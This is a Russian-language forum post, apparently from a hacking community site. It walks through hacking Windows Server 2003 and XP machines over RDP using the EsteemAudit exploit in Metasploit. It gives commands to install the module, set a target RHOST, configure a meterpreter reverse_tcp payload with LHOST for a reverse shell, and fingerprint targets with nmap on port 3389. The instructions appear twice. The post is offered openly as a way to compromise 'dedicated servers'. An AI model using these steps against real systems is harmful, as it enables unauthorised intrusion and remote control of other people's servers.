РАЗБОР
Статья
Взлом RDP windows 2017
Режим чтения
[ обложка статьи ]
Приветствую всех, отважился я на такой поступок как по балывать паблик)) (пабликом) по делится с Вами новым приёмом хека дедика, а именно: Windows Server 2003 SP1,SP2 и Windows XP SP0, SP1, SP3
Для начала нам по требуется скачать експлойт и установить его в Metasploit создав специальную для него папку в каталоге метасплойта: (все команды выполняем находясь в данной папке!)
затем копируем руби скрипт в эту же папку командой:
Для работы скрипта по требуются еще и файлы:
копируем все в созданную нами папку:
Запускаем Metasploit и настраиваемся на этот експлойт посмотрев его настройки.
задаем атакуемый RHOST
и нагрузку: set PAYLOAD windows/meterpreter/reverse_tcp
и конечно же наладим обратную связь: set LHOST <свой IP>
и ВАЖНО еще настроить експлойт, задать версию ОС windows для него, предварительно узнав какие версии он поддерживает командой: show TARGETS
а вообще узнать какую ОС мы атакуем можно с помощью сканера NMAP командой:
nmap -sS -sC -sV -O -p3389 <атакуемый_IP>
и, exploit
Удачи!..) и хех, помните мою доброту!))
Для начала нам по требуется скачать експлойт и установить его в Metasploit создав специальную для него папку в каталоге метасплойта: (все команды выполняем находясь в данной папке!)
Код:
mkdir /opt/metasploit-framework/modules/exploits/windows/rdp
затем копируем руби скрипт в эту же папку командой:
Код:
cp esteemaudit.rb /opt/metasploit-framework/modules/exploits/windows/rdp/
Для работы скрипта по требуются еще и файлы:
Код:
mkdir /usr/share/esteemaudit
копируем все в созданную нами папку:
Код:
cd files
cp * /usr/share/esteemaudit/
Запускаем Metasploit и настраиваемся на этот експлойт посмотрев его настройки.
задаем атакуемый RHOST
и нагрузку: set PAYLOAD windows/meterpreter/reverse_tcp
и конечно же наладим обратную связь: set LHOST <свой IP>
и ВАЖНО еще настроить експлойт, задать версию ОС windows для него, предварительно узнав какие версии он поддерживает командой: show TARGETS
а вообще узнать какую ОС мы атакуем можно с помощью сканера NMAP командой:
nmap -sS -sC -sV -O -p3389 <атакуемый_IP>
и, exploit
Удачи!..) и хех, помните мою доброту!))
AI-выжимка
сгенерировано ИИ
Тезисы статьи скоро
Статья читается полностью. Тезисы со ссылками на разделы появятся позже.
Содержание
Codeby Academy
Практика и мастерство
От основ до продвинутого — программы для практиков Codeby.
Перейти к курсу →
Поиск в обсуждении
Карта ветки
Продолжить чтение
Следующий разбор
Песочница, в которой прятался враг
Ещё по теме
- Статья
- Статья
- Статья
Комментарии
51